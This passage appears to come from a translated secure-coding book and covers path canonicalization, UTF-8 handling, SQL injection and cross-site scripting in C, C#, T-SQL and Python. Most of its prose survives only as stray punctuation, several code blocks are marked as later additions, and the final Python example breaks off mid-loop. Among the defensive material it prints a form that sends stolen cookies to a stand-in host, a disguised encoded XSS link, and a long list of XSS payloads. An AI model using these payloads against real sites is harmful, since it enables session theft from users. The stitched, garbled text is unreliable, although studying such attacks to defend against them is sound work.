            throw ERR_CANON_TOO_BIG;

        // Allocate room for the temporary full name,
        // the '\\?\' prefix and the trailing '\0'.
        LPCTSTR szPrefix = _T("\\\\?\\");
        size_t cchPrefix = lstrlen(szPrefix);
        size_t cchTempFullDir = cNewFilename + 1 + cchPrefix;
        szTempFullDir = new TCHAR[cchTempFullDir];
        if (szTempFullDir == NULL)
            throw ERR_CANON_NO_MEM;

        // Step 4
        // Build the full name. The \\?\ prefix turns off
        // path parsing, so the name is passed through
        // without interpretation.
        if (StringCchPrintf(szTempFullDir,
                            cchTempFullDir,
                            _T("%s%s\\%s"),
                            szPrefix,
                            szDir,
                            szFilename) != S_OK)
            throw ERR_CANON_INVALID_FILENAME;

        // Step 5
        // Get the full path name, which also resolves
        // any parent-directory (..) components.
        TCHAR szFullPathName [MAX_PATH + 1];
        LPTSTR szFilenamePortion = NULL;
        DWORD dwFullPathLen =
            GetFullPathName(szTempFullDir,
                            MAX_PATH,
                            szFullPathName,
                            &szFilenamePortion);
        if (dwFullPathLen == 0)
            throw ERR_CANON_INVALID_PATH;
        if (dwFullPathLen > MAX_PATH)
            throw ERR_CANON_NO_MEM;

        // Step 6
        // Get the long name (expands 8.3 short names).
        if (GetLongPathName(szFullPathName,
                            szFullPathName,
                            MAX_PATH) == 0) {
            errCanon errName = ERR_CANON_TOO_BIG;
            switch (GetLastError()) {
                case ERROR_FILE_NOT_FOUND :
                    errName = ERR_CANON_NO_FILE;
                    break;
                case ERROR_NOT_READY :
                case ERROR_PATH_NOT_FOUND :
                    errName = ERR_CANON_NO_PATH;
                    break;
                default : break;
            }
            throw errName;
        }

        // Step 7
        // Is this a disk file rather than a device?
        hFile = CreateFile(szFullPathName,
                           0,0,NULL,
                           OPEN_EXISTING,
                           SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION,
                           NULL);
        if (hFile == INVALID_HANDLE_VALUE)
            throw ERR_CANON_NO_FILE;
        if (GetFileType(hFile) != FILE_TYPE_DISK)
            throw ERR_CANON_NOT_A_FILE;

        // Everything is OK, so copy the canonical name
        // into the caller's buffer (pszNewFilename).
        const size_t cchNewFilename = lstrlen(szFullPathName)+1;
        *pszNewFilename = new TCHAR[cchNewFilename];
        if (*pszNewFilename != NULL)
            StringCchCopy(*pszNewFilename,cchNewFilename,szFullPathName);
        else
            err = ERR_CANON_NO_MEM;
    } catch(errCanon e) {
        err = e;
    } catch (const std::bad_alloc&) {
        err = ERR_CANON_NO_MEM;
    }

    delete [] szTempFullDir;
    // CreateFile returns INVALID_HANDLE_VALUE (not NULL) on failure,
    // so test for that before closing.
    if (hFile != INVALID_HANDLE_VALUE) CloseHandle(hFile);
    return err;
}
Secureco2\Chapter11\CleanCanon. CreateFile : , , ,
, .
CreateFile
, , , dwFlagsAndAttributes . .
,
,
. . , , ,
. ,
, , ,
.
,
, . ,
SECURITY_SQOS_PRESENT | SECURITY_IDENTIFICATION
, FILE_FLAG_OPEN_NO_RECALL, ,
, .
(Hierarchical Storage Manage
ment) .
Web.
Web
,
, ,
.
.
,
. : .
: , ,
, .
, ,
, !
UTF-8
UTF8,
Windows MultiByteToWideChar.
,
UTF8. Secureco2\Chapter11\UTF8. , UTF8 ,
WideCharToMultiByte, CP_UTF8.
#include <windows.h>
#include <stdio.h>

// FromUTF8 appears on the page only through its calls. This version
// converts the bytes with MultiByteToWideChar(CP_UTF8, ...) as the text
// describes, and passes MB_ERR_INVALID_CHARS so that malformed input
// (such as overlong sequences) is rejected instead of decoded.
void FromUTF8(const BYTE *pUTF8, DWORD cbUTF8) {
    WCHAR wszResult[MAX_PATH + 1];
    int cchResult = MultiByteToWideChar(CP_UTF8, MB_ERR_INVALID_CHARS,
                                        (LPCSTR)pUTF8, (int)cbUTF8,
                                        wszResult, MAX_PATH);
    if (cchResult == 0) {
        printf("Invalid UTF-8 sequence (error %lu)\n", GetLastError());
        return;
    }
    for (int i = 0; i < cchResult; i++)
        printf("U+%04X ", wszResult[i]);
    printf("\n");
}

int main() {
    // Valid UTF-8: the single byte 0x5C is the backslash (\).
    BYTE pUTF8_1[] = {0x5C};
    DWORD cbUTF8_1 = sizeof pUTF8_1;
    FromUTF8(pUTF8_1, cbUTF8_1);

    // Invalid UTF-8: 0xC0 0xAF is an overlong encoding
    // that would decode to the slash (/); it must be rejected.
    BYTE pUTF8_2[] = {0xC0, 0xAF};
    DWORD cbUTF8_2 = sizeof pUTF8_2;
    FromUTF8(pUTF8_2, cbUTF8_2);

    // Valid UTF-8: 0xC2 0xA9 is the copyright sign.
    BYTE pUTF8_3[] = {0xC2, 0xA9};
    DWORD cbUTF8_3 = sizeof pUTF8_3;
    FromUTF8(pUTF8_3, cbUTF8_3);
    return 0;
}
ISAPI
ISAPI , , ,
C C++, Web
. IIS 6
SCRIPT_TRANSLATED,
URL, (, , ).
:
,
,
,
.
, .
, .
, Web, ,
, .
DNS, northwindtraders.com. IP,
192.168.197.100. .
localhost, IP
127.n.n.n. Windows NetBIOS,
\\northwindtraders.
, ,
?
,
. ( Secureco2\Chapter11\CanonServer)
.
/*
  CanonServer.cpp
*/
#include <windows.h>
#include <stdio.h>
#include <tchar.h>

int main() {
    for (int i = ComputerNameNetBIOS;
         i <= ComputerNamePhysicalDnsFullyQualified;
         i++) {
        TCHAR szName[256];
        DWORD dwLen = sizeof szName / sizeof TCHAR;
        const TCHAR *cnf;
        switch(i) {
            case ComputerNameNetBIOS                   : cnf = _T("ComputerNameNetBIOS"); break;
            case ComputerNameDnsHostname               : cnf = _T("ComputerNameDnsHostname"); break;
            case ComputerNameDnsDomain                 : cnf = _T("ComputerNameDnsDomain"); break;
            case ComputerNameDnsFullyQualified         : cnf = _T("ComputerNameDnsFullyQualified"); break;
            case ComputerNamePhysicalNetBIOS           : cnf = _T("ComputerNamePhysicalNetBIOS"); break;
            case ComputerNamePhysicalDnsHostname       : cnf = _T("ComputerNamePhysicalDnsHostname"); break;
            case ComputerNamePhysicalDnsDomain         : cnf = _T("ComputerNamePhysicalDnsDomain"); break;
            case ComputerNamePhysicalDnsFullyQualified : cnf = _T("ComputerNamePhysicalDnsFullyQualified"); break;
            default                                    : cnf = _T("Unknown"); break;
        }
        BOOL fRet =
            GetComputerNameEx((COMPUTER_NAME_FORMAT)i,
                              szName,
                              &dwLen);
        if (fRet) {
            _tprintf(_T("%s (%s)\n"), szName, cnf);
        } else {
            _tprintf(_T("%s failed with error %lu\n"), cnf, GetLastError());
        }
    }
    return 0;
}
IP ( ) getaddrinfo
Windows Sockets (Winsock) Perl.
, :
, Windows
: <>\<_>. SAM.
, DEVELOPMENT\Blake Blake DEVELOPMENT. Windows 2000
(user principal name, UPN),
: <_>@<>, blake@development.northwindtraders.com.
:
Windows 2000
SAM. SAM,
, : Win
dows NT 4, Windows 2000, Windows 2000 Active Directory Windows XP.
GetUserNameEx, (see Secureco2\Chapter11\CanonUser):
/*
  CanonUser.cpp
*/
#define SECURITY_WIN32
#include <windows.h>
#include <security.h>
#include <stdio.h>
#include <tchar.h>
#pragma comment(lib, "secur32.lib")

int main() {
    // EXTENDED_NAME_FORMAT is not contiguous (values 4 and 5 are unused),
    // so the labels are keyed by enumerator rather than by position.
    for (int i = NameUnknown ;
         i <= NameServicePrincipal;
         i++) {
        TCHAR szName[256];
        ULONG dwLen = sizeof szName / sizeof TCHAR;
        const TCHAR *enf = NULL;
        switch(i) {
            case NameUnknown          : enf = _T("NameUnknown"); break;
            case NameFullyQualifiedDN : enf = _T("NameFullyQualifiedDN"); break;
            case NameSamCompatible    : enf = _T("NameSamCompatible"); break;
            case NameDisplay          : enf = _T("NameDisplay"); break;
            case NameUniqueId         : enf = _T("NameUniqueId"); break;
            case NameCanonical        : enf = _T("NameCanonical"); break;
            case NameUserPrincipal    : enf = _T("NameUserPrincipal"); break;
            case NameCanonicalEx      : enf = _T("NameCanonicalEx"); break;
            case NameServicePrincipal : enf = _T("NameServicePrincipal"); break;
            default                   : enf = _T("Unknown"); break;
        }
        BOOL fRet =
            GetUserNameEx((EXTENDED_NAME_FORMAT)i,
                          szName,
                          &dwLen);
        if (fRet) {
            _tprintf(_T("%s (%s)\n"), szName, enf);
        } else {
            _tprintf(_T("%s failed with error %lu\n"), enf, GetLastError());
        }
    }
    return 0;
}
, :
.
,
. , ACL.
:
, ,
. , .
, :
,
, .
,
.
, !
12
Web
(). , Web XML Web
, ,
.
, Web, . ( 13
Web,
, .)
SQL;
.
2001 . Microsoft Professional Developers Con
ference ( Microsoft)
.
Web .
, 15 .
,
, , .
SQL, ,
, .
,
,
.
, , .
: ,
, .
, ,
,
.
,
: , ,
,
. .
, (
, ):
string sql = "select * from client where name = '" + name + "'";
name . ,
name SQL. ,
Blake, SQL:
Figure 12-1. Customer and Creditcard tables (schema diagram):
Creditcard: CustomerID, CreditCardID, Type, Number, Expires
Customer: CustomerID, LastName, FirstName, MiddleInitial, Address, Apartment, City, State, PostalCode, Country
. ,
,
SQL. , SQL,
,
, .
,
Microsoft SQL Server, IBM DB2, Oracle, PostgreSQL MySql.
, SQL (SQL injection).
SQL,
, or.
SQL,
, .
SQL . ,
SQL Server :
{
failed\n\r";
se.Errors) {
+ "\n\r";
C#? : SQL
,
SQL. . Web
sa, (sysadmin)
SQL Server.
: sa SQL Server , SYSTEM Windows NT
.
. sa Oracle
internal.
sa. :
! , .
: SQL
,
, SQL. ,
, ,
.
, .
1:
,
, . ,
.
, ,
SQL:
2:
, ,
, SQL. !
, .
, sp_GetName:
, ,
, :
1:
SQL Server
(sysadmin)
Web Web. ,
.
Web
.
Web
,
.
SQL , ,
SQL, ,
, :
;
;
;
, ;
;
;
.
.
. Trusted_Connection=True.
( )
,
,
.
,
.
,
. , SQL Server xp_cmdshell,
. Oracle
utl_file,
.
sysadmin
.
. ,
. ,
!
, SQL.
, .
2:
SQL-
SQL ,
, .
SQL
. (place
holder), (parameterized
command). , SQL
. :
cmd.Prepared = true

' CreateParameter arguments:
' 200 = adVarChar (varchar parameter);
' 1 = adParamInput (input parameter);
' 32 = maximum size in characters.
Set parm1 = cmd.CreateParameter("name", 200, 1, 32, "")
cmd.Parameters.Append parm1
parm1.Value = strName

Set parm2 = cmd.CreateParameter("pwd", 200, 1, 32, "")
cmd.Parameters.Append parm2
parm2.Value = strPwd

Set rs = cmd.Execute

IsValidUserAndPwd = false
If rs(0).value = 1 Then IsValidUserAndPwd = true

rs.Close
cn.Close
End Function
, ,
SQL. ,
: , !
. , ,
SQL,
, .
ODBC , SQLNumParams
SQLBindParam. OLE DB ICommandWithParameters. , SqlCommand.
, Web.
.
, .
, quotename. ,
select top 3 name from mytable select top 3 [name] from
[mytable], name mytable. quotename
TransactSQL ( .
SQL Server Books Online). ,
. ,
SQL Query Analyzer .
, ASCII,
.
declare @a varchar(20)
set @a=0x74735D27
select @a
set @a=quotename(@a)
select @a
set @a='ts]'''
select @a
set @a=quotename(@a)
select @a
@a (ts] ).
, [ ].
, sp_executesql
SQL, .
:
-- Set the parameter value.
declare @name varchar(64)
set @name = N'White'
-- Run the parameterized statement.
exec sp_executesql
    N'select au_id from pubs.dbo.authors where au_lname=@lname',
    N'@lname varchar(64)',
    @lname = @name
SQL Server, ,
, ,
. ,
! :
, , .
,
,
( ). Web C#
: , ,
.
//
// SafeQuery
//
using System;
using System.Data;
using System.Data.SqlTypes;
using System.Data.SqlClient;
using System.Security.Principal;
using System.Security.Permissions;
using System.Text.RegularExpressions;
using System.Threading;
using System.Web;
using Microsoft.Win32;

// The page shows the method and the property without an enclosing
// class; this one is added so the code compiles.
class SafeQuery {
    [SqlClientPermissionAttribute(SecurityAction.PermitOnly,
                                  AllowBlankPassword=false)]
    [RegistryPermissionAttribute(SecurityAction.PermitOnly,
                                 Read=@"HKEY_LOCAL_MACHINE\SOFTWARE\Client")]
    static string GetName(string Id)
    {
        SqlCommand cmd = null;
        string Status = "Name Unknown";
        try {
            // Check that the ID is well formed (4 to 10 digits).
            Regex r = new Regex(@"^\d{4,10}$");
            if (!r.Match(Id).Success)
                throw new Exception("Invalid ID");

            // Open the database connection.
            SqlConnection sqlConn= new SqlConnection(ConnectionString);

            // Call the stored procedure with the ID as a typed parameter.
            string str="sp_GetName";
            cmd = new SqlCommand(str,sqlConn);
            cmd.CommandType = CommandType.StoredProcedure;
            cmd.Parameters.Add("@ID",Convert.ToInt64(Id));
            cmd.Connection.Open();
            Status = cmd.ExecuteScalar().ToString();
        } catch (Exception e) {
            if (HttpContext.Current.Request.UserHostAddress == "127.0.0.1")
                Status = e.ToString();
            else
                Status = "Error Processing Request";
        } finally {
            // Always close the connection.
            if (cmd != null)
                cmd.Connection.Close();
        }
        return Status;
    }

    // The connection string is read from the registry, not embedded in code.
    internal static string ConnectionString {
        get {
            return (string)Registry
                .LocalMachine
                .OpenSubKey(@"SOFTWARE\Client\")
                .GetValue("ConnectionString");
        }
    }
}
.
,
.
; .
: 4 10 , .
.
, Web
(, ).
, .
,
sa. ,
,
.
, .
64
( ).
.
, .
, . ,
, .
.
, ,
(ID) 4 10 .
^\d{4,10}$, 4 10
(\d{4,10}) (^) ($) .
,
: SQL
.
System.Text.RegularExpressions.
. ,
, SqlConnection, .
ConnectionString. ,
Web
.
data source=db007a;
user id=readuser;
password=&ugv4!26dfA!+8;
initial catalog=client
: db007a.
Web,
SQL.
sa, ,
readuser ( ) ,
SQL
client. Web
, master ,
, .
SQL
. ,
,
,
.
, ( , )
, Web.
, Web,
, ! ,
:
AppDomain.CurrentDomain.SetPrincipalPolicy(PrincipalPolicy.WindowsPrincipal);
WindowsPrincipal user = (WindowsPrincipal)Thread.CurrentPrincipal;
if (user.IsInRole(WindowsBuiltInRole.Administrator)) {
    // Running as an administrator: fail rather than continue
    // with that much privilege.
}
, finally. try/catch
, ,
,
.
.
, .NET Framework
.
. ,
SQLClientPermissionAttribute, SQL Server .NET Data Provider
,
AllowBlankPassword false, .
SQL Server
.
, RegistryPermissionAttribute, (
) (, ..). ,
Read @"HKEY_LOCAL_MACHINE\SOFTWARE\Shipping",
,
. ,
.
,
, .
,
.
, ,
, , ,
SQL. ,
.
, !
,
. , , .
.
,
.
, .
, .
13
Web-
, ,
Web. , ,
Web . , 10
11, Web ,
12.
Web
. , Web,
, , . ,
, ,
. , : ,
, .
( ,
) HTTP, ,
SSL (Secure Sockets Layer) TLS (Transport
Layer Security). , !
- :
, (crosssite scripting, XSS)
. ,
:
Web. ,
Web
. ?
:
Web , ;
Web ,
.
, :
Hello,
<%
Response.Write(Request.Querystring("name"))
%>
, name QueryString,
www.contoso.com/req.asp?name=Blake.
, , ,
, Web,
? , , , ,
, :
<a href=www.contoso.com/req.asp?name=scriptcode>
$1 000 000</a>
scriptcode :
<script>x=document.cookie;alert(x);</script>
, , ,
. , :
<a href="http://www.microsoft.com@%77%77%77%2E%65%78%70%6C%6F%72%61%74%69
%6F%6E%61%69%72%2E%63%6F%6D%2F%72%65%71%2E%61%73%70%3F%6E%61%6D%65%3D%3C
%73%63%72%69%70%74%3E%78%3D%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B
%61%6C%65%72%74%28%78%29%3B%3C%2F%73%63%72%69%70%74%3E">
$1 000 000</a>
, www.microsoft.com, !
, URL: http://
< >:<>@<Web>. RFC 1738, Uniform
Resource Locators (URL) (ftp://ftp.isi.edu/innotes/rfc1738.txt).
3.1. Common Internet Scheme Syntax ( ):
URL
, URL,
IP
, : //<>:<
>@<>:<>/<url>.
: URL .
URL: www.microsoft.com . ,
, Web,
, ,
!
, ( XSS). name
, , HTML JavaScript,
, cookie, docu
ment.cookie. , cookie . ,
cookie, contoso.com, Web
, Web microsoft.com.
: ,
? , ,
, contoso.com,
cookie contoso.com. ,
, ,
, .
cookie
. ,
, .
. 2001 . Web
passport.com ,
. Hotmail
, passport.com,
Hotmail hotmail.passport.com. ,
cookie, Passport
. cookie
HTTP,
.
cookie.
(poisoning). (plugin)
(native) , (,
ActiveX SiteLock, 16),
,
. ,
.
(spoofing) . ,
XSS. ,
. ,
(. 131).
XSS
.
3.
Web
. , ,
. , Dynamic
HTML (DHTML) ,
.
.
<a href=http://www.contoso.com/req.asp?name=
<FORM action=http://www.badsite!sample!13.com/data.asp
method=post id="idForm">
<INPUT name="cookie" type="hidden">
</FORM>
<SCRIPT>
idForm.cookie.value=document.cookie;
idForm.submit();
</SCRIPT> >
!
</a>
, HTML
. , .
cookie Web.
!
SSL/TLS .
XSS.
,
(
). ,
,
,
. , , Web,
Web. (
querystring.)
, ,
.
Web-
Web-
Web-
. 131.
XSS
Web-
,
(/ )
cookie XSS , ,
cookie, . ,
cookie , ,
, . ,
cookie.
XSS CrossSite Scripting
Overview ( ) (http://
www.microsoft.com/technet/itsolutions/security/topics/csoverv.asp).
Open Web Appli
cation Security Project (http://www.owasp.org).
<SCRIPT>
.
<script>,
Web.
.
, <img src> <a href>
, URL. , ,
:
, : ,
, . ,
.
,
HTML. ,
:
http://www.microsoft.com onmouseover="malicious!script"
onmouseover HTML.
,
. ,
onload onactivate.
. ?
, XSS
XSS: , HTML
, , Windows (CHM
), HTML. .
XSS-
XSS Web, ,
.
XSS HTML .
,
, ,
.
. ,
CLYBG5EV, KDEJ41EB, ONWN
WXYR, W5U7GT63 ( CryptGenRandom).
. HTML
, ,
, .
, HTML
URL .
: localxss.html c:\webfiles:
<html>
<head>
<title> XSS!</title>
</head>
<body>
!
<script>document.write(location.hash)</script>
</body>
</html>
Web ,
(#) URL.
!:
file://C:\webfiles\localxss.html#<script>alert('!');</script>
, .
My Computer ( ). (Microsoft Internet Explorer
, .)
, , Internet (
), ,
My Computer.
Internet Explorer, .
location.search location.href.
, ,
Internet Explorer ,
. Internet Explorer 6 SP1,
Microsoft Windows XP SP1 Microsoft Windows .NET Server 2003
,
Internet My Computer.
. 131: Web
Web , !
Internet Explorer 4
.
, .
Web.
, Web
, . ,
.
, ,
Web.
,
.
,
,
. Internet Explorer : (
): My Computer ( ), Trusted Sites ( ), Local
Intranet ( ), Internet () Restricted Sites (
).
HTML-
HTML , , .
Internet Explorer res:,
( , HTML) DLL
, EXE . , res://mydll.dll/#23/
ERROR HTML ( #23) ERROR
XSS-
, ,
XSS ,
. ( ?)
,
. ,
. XSS
SQL
,
.
(
):
;
;
innerText;
;
HttpOnly cookie Internet Explorer 6 SP1;
Internet Explorer;
<FRAME SECURITY> Internet Explorer;
ValidateRequest ASP.NET 1.1.
( )
, , ,
,
. .
. ,
Server. HTMLEncode ASP HttpServerUtility. HTML
Encode ASP.NET. ,
HTML, , <
<.
HTML, ,
. , www.contoso.com/product.asp?id=210502
ASP:
<a href=http://www.contoso.com/detail.asp?id=2105>
, id,
<a> <script>.
id : 2105><script event=onload>exploitcode
</script>.
<a>,
. , 2105 onclick="exploitcode" <a>,
onclick, , exploit.
,
, , :
<a href="http://www.contoso.com/
detail.asp?id=<%= Server.HTMLEncode (request.querystring("id")) %>">
,
href. id,
, detail.asp
id, , id. , 2105
onclick=exploitcode :
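The id-in-href example above, as an added Python example (not the book's code): the vulnerable link builder next to the Server.HTMLEncode-style fix, checked with the standard library's HTML parser to see what a browser would actually parse out of the result. The payloads are constructed after the ones in the text; function names such as safe_detail_link and the injected() oracle are the example's own.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote


def unsafe_detail_link(product_id: str) -> str:
    """The vulnerable pattern from the text: the query-string value is
    dropped into an unquoted href with no encoding at all."""
    return f"<a href=http://www.contoso.com/detail.asp?id={product_id}>"


def safe_detail_link(product_id: str) -> str:
    """The Server.HTMLEncode fix: quote the attribute and HTML-encode the
    value, so < > & and quotes cannot end the attribute or open a tag."""
    encoded = html.escape(product_id, quote=True)
    return f'<a href="http://www.contoso.com/detail.asp?id={encoded}">'


def safer_detail_link(product_id: str) -> str:
    """Belt and braces: the value lives inside a URL, so URL-encode it first
    and HTML-encode the result. The two encodings address different parsers."""
    encoded = html.escape(quote(product_id, safe=""), quote=True)
    return f'<a href="http://www.contoso.com/detail.asp?id={encoded}">'


class _TagCollector(HTMLParser):
    """Records every tag and its attribute names, as a browser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))


def injected(fragment: str) -> bool:
    """True if the fragment parses as anything other than a single <a>
    carrying only href: an extra tag or attribute means the attacker
    escaped the attribute value."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags != [("a", ["href"])]


# Constructed attacker inputs modelled on the ones in the text.
PAYLOADS = [
    "2105><script>alert(document.cookie)</script>",
    '2105 onclick="alert(document.cookie)"',
]

if __name__ == "__main__":
    for payload in PAYLOADS:
        for builder in (unsafe_detail_link, safe_detail_link, safer_detail_link):
            link = builder(payload)
            print(f"{builder.__name__:19} injected={injected(link)!s:5} {link}")
```

Note that encoding alone is not a substitute for the allowlist check on id shown earlier in the chapter; the two measures cover different failure modes and belong together.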
innerText
innerText ,
,
. :
<html>
<body>
<span id=spnTest></span>
</body>
</html>
<script for=window event=onload>
spnTest.innerText = location.hash;
</script>
HTML URL, ,
, .
file://C:\webfiles/xss.html#<script>alert(1);</script>
innerHTML
. !
Web
, .
, , <meta>,
Web
:
HttpOnly cookie-
Internet Explorer 6 SP1
Windows Security Push ,
Internet Explorer, XSS, cookie
, cookie
HttpOnly. , cookie DHTML
Internet Explorer 6 SP1:
#include <windows.h>
#include <httpfilt.h>
#include <strsafe.h>

// ISAPI filter: append "HttpOnly" to every Set-Cookie header the server sends.
DWORD WINAPI HttpFilterProc(
    PHTTP_FILTER_CONTEXT pfc,
    DWORD dwNotificationType,
    LPVOID pvNotification) {

    // Buffer for the cookie header; 2K is ample for any sane cookie.
    CHAR szCookie[2048];
    DWORD cbCookieOriginal = sizeof(szCookie) / sizeof(szCookie[0]);
    DWORD cbCookie = cbCookieOriginal;

    HTTP_FILTER_SEND_RESPONSE *pResponse =
        (HTTP_FILTER_SEND_RESPONSE*)pvNotification;

    CHAR *szHeader = "Set-Cookie:";
    CHAR *szHttpOnly = "; HttpOnly";

    if (pResponse->GetHeader(pfc, szHeader, szCookie, &cbCookie)) {
        if (SUCCEEDED(StringCchCat(szCookie,
                                   cbCookieOriginal,
                                   szHttpOnly))) {
            if (!pResponse->SetHeader(pfc,
                                      szHeader,
                                      szCookie)) {
                // Could not rewrite the header: sending no cookie at all
                // is safer than sending one without HttpOnly.
                pResponse->SetHeader(pfc, szHeader, "");
            }
        } else {
            // The header is too long to append to; drop the cookie
            // rather than let it out unprotected.
            pResponse->SetHeader(pfc, szHeader, "");
        }
    }

    return SF_STATUS_REQ_NEXT_NOTIFICATION;
}
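The same transformation the ISAPI filter performs, as an added Python example (not the book's code) over a constructed list of response headers. It also handles two cases the C listing leaves to the reader: a cookie that already carries HttpOnly, and an oversize cookie, which is dropped for the same reason the filter drops it when StringCchCat fails. MAX_COOKIE_HEADER mirrors the filter's 2K buffer; the optional Secure flag is added here because HttpOnly on its own does nothing for a cookie sent over plain HTTP.

```python
MAX_COOKIE_HEADER = 2048  # the same 2K ceiling as the ISAPI filter's buffer


def add_httponly(headers, also_secure=False):
    """Return a copy of a (name, value) response-header list in which every
    Set-Cookie header carries HttpOnly (and, optionally, Secure).

    Beyond what the C filter does it also handles:
      - a cookie that already has the attribute (no duplicate is appended);
      - an oversize cookie, which is dropped rather than sent unprotected,
        the same choice the filter makes when StringCchCat fails.
    """
    out = []
    for name, value in headers:
        if name.lower() != "set-cookie":
            out.append((name, value))
            continue

        # First piece is NAME=VALUE; the rest are attributes (case-insensitive).
        pieces = [p.strip() for p in value.split(";")]
        present = {p.split("=", 1)[0].lower() for p in pieces[1:] if p}
        extra = []
        if "httponly" not in present:
            extra.append("HttpOnly")
        if also_secure and "secure" not in present:
            extra.append("Secure")

        new_value = "; ".join([p for p in pieces if p] + extra)
        if len(new_value) > MAX_COOKIE_HEADER:
            continue  # too big to fix safely: better no cookie than a naked one
        out.append((name, new_value))
    return out


# Constructed response headers for the demo.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "SESSIONID=0005F1CD; path=/"),
    ("Set-Cookie", "pref=blue; path=/; HttpOnly"),
    ("Set-Cookie", "big=" + "x" * 2100),
]

if __name__ == "__main__":
    for name, value in add_httponly(SAMPLE_HEADERS, also_secure=True):
        print(f"{name}: {value[:80]}")
```

Applying the function twice leaves the headers unchanged, which is the property a filter that sits in front of several applications must have.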
ASP.NET:
XSS HTML. Internet Explorer
HTML , My Computer.
, , Internet Explorer 4.0,
, , , ,
Web .
. 132 msdn.microsoft.com ,
My Computer, Internet,
.
. 132. MSDN,
Internet, My Computer
:
<!--
  validateRequest can be set in machine.config or in web.config,
  inside <location> or <system.web>.
-->
<configuration>
    <system.web>
        <pages validateRequest="true"/>
    </system.web>
</configuration>
, true, ,
.
, Web,
, HTML,
, Web <IMG>
<TABLE>. HTML , .
. ,
.
:
<img src=javascript:alert([code])>
<link rel=stylesheet href="javascript:alert([code])">
<input type=image src=javascript:alert([code])>
<bgsound src=javascript:alert([code])>
<iframe src="javascript:alert([code])">
<frameset onload=vbscript:msgbox([code])></frameset>
<table background="javascript:alert([code])"></table>
<object type=text/html data="javascript:alert([code]);"></object>
<body onload="javascript:alert([code])"></body>
<body background="javascript:alert([code])"></body>
<p style=left:expression(alert([code]))>
, http://online.securityfocus.com/archive/1/
272037:
<a href="javascript#[code]">
<div onmouseover="[code]">
<img src="javascript:[code]">
<img dynsrc="javascript:[code]">
<input type="image" dynsrc="javascript:[code]">
<bgsound src="javascript:[code]">
&<script>[code]</script>
&{[code]};
<img src=&{[code]};>
<link rel="stylesheet" href="javascript:[code]">
<iframe src="vbscript:[code]">
<img src="mocha:[code]">
<img src="livescript:[code]">
<a href="about:<script>[code]</script>">
<meta http-equiv="refresh" content="0;url=javascript:[code]">
<body onload="[code]">
<div style="background-image: url(javascript:[code]);">
<div style="behaviour: url([code]);">
<div style="binding: url([code]);">
<div style="width: expression([code]);">
<style type="text/javascript">[code]</style>
<object classid="clsid:..." codebase="javascript:[code]">
<style><!--</style><script>[code]//--></script>
<![CDATA[<!--]]><script>[code]//--></script>
<!-- --><script>[code]</script><!-- -->
<<script>[code]</script>
<img src="blah"onmouseover="[code]">
<img src="blah>" onmouseover="[code]">
<xml src="javascript:[code]">
<xml id="X"><a><b><script>[code]</script>;</b></a></xml>
<div datafld="b" dataformatas="html" datasrc="#X"></div>
[\xC0][\xBC]script>[code][\xC0][\xBC]/script>
.
Internet Explorer, Netscape Navigator, Mozilla Opera,
. ,
.
HTML.
, ,
, JScript,
JScript
. VBScript,
?
HTML .
, jscript:, vbscript: javascript:?
Netscape Navigator livescript: mocha:
, &{}!
, , ,
HTML,
.
, .
,
HTML Web-
HTML,
. HTML
,
. <EM>,
<PRE>, <BR>, <P>, <I></I> <B></B> ,
.
, :
if (/^(?:[\s\w\?\!\,\.\'\"]*|(?:\<\/?(?:i|b|p|br|em|pre)\>))*$/i) {
    # Only plain text and the handful of harmless tags above: accept.
}
(\s),
AZ, az, 09 (\w),
(<)
(/), i, b, p, pr, em pre
(>). i
. ,
HTML. , Hello, </i>World!<i>
, HTML,
.
! , HTML .
,
.
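To make the limitation concrete, here is an added Python example (not from the book) that ports the Perl allowlist above and sets it beside a small parser-based allowlist built on html.parser. The parser accepts the same six tags but additionally insists on balanced nesting, no attributes and nothing but plain text between tags, which is exactly what a token-level regex cannot check: the regex accepts Hello, </i>World!<i> and the parser does not. Names like parser_allows and the sample inputs are the example's own.

```python
import re
from html.parser import HTMLParser

ALLOWED_TAGS = {"i", "b", "p", "br", "em", "pre"}
VOID_TAGS = {"br"}
TEXT_CHARS = r"[\s\w?!,.'\"]"

# The Perl allowlist from the text, ported to Python. The text run uses +
# instead of * so the outer repetition never has an empty iteration
# (nested quantifiers of that shape also backtrack badly on long input).
ALLOWLIST_RE = re.compile(
    r"(?:" + TEXT_CHARS + r"+|</?(?:i|b|p|br|em|pre)>)*", re.IGNORECASE)
TEXT_RE = re.compile(TEXT_CHARS + r"*")


def regex_allows(fragment: str) -> bool:
    """Accept when the whole input is allowed text and allowed tags, in any
    order. Nesting and balance are not checked: tags are just tokens."""
    return ALLOWLIST_RE.fullmatch(fragment) is not None


class _AllowlistChecker(HTMLParser):
    """Parser-based allowlist: same tags, but no attributes, balanced
    nesting, and nothing that is not plain text or one of those tags."""

    def __init__(self) -> None:
        super().__init__()
        self.ok = True
        self.stack = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS or attrs:
            self.ok = False
        elif tag not in VOID_TAGS:
            self.stack.append(tag)

    def handle_startendtag(self, tag, attrs):   # <br/>
        if tag not in ALLOWED_TAGS or attrs:
            self.ok = False

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        if not self.stack or self.stack.pop() != tag:
            self.ok = False

    def handle_data(self, data):
        # Entities are decoded before we get here, so '&lt;' shows up as '<'.
        if TEXT_RE.fullmatch(data) is None:
            self.ok = False

    # Comments, doctypes, processing instructions and CDATA have no place
    # in a user comment field.
    def handle_comment(self, data): self.ok = False
    def handle_decl(self, decl): self.ok = False
    def handle_pi(self, data): self.ok = False
    def unknown_decl(self, data): self.ok = False


def parser_allows(fragment: str) -> bool:
    checker = _AllowlistChecker()
    checker.feed(fragment)
    checker.close()
    return checker.ok and not checker.stack


# Constructed inputs.
SAMPLES = [
    "Hello, <i>World!</i>",
    "Hello, </i>World!<i>",            # passes the regex, fails the parser
    "<i><b>nested</i></b>",            # same
    "<b onmouseover=alert(1)>hi</b>",  # attribute: both reject
    "<img src=x onerror=alert(1)>",    # unknown tag: both reject
    "Hello <pre>",                     # unclosed: parser rejects
]

if __name__ == "__main__":
    for s in SAMPLES:
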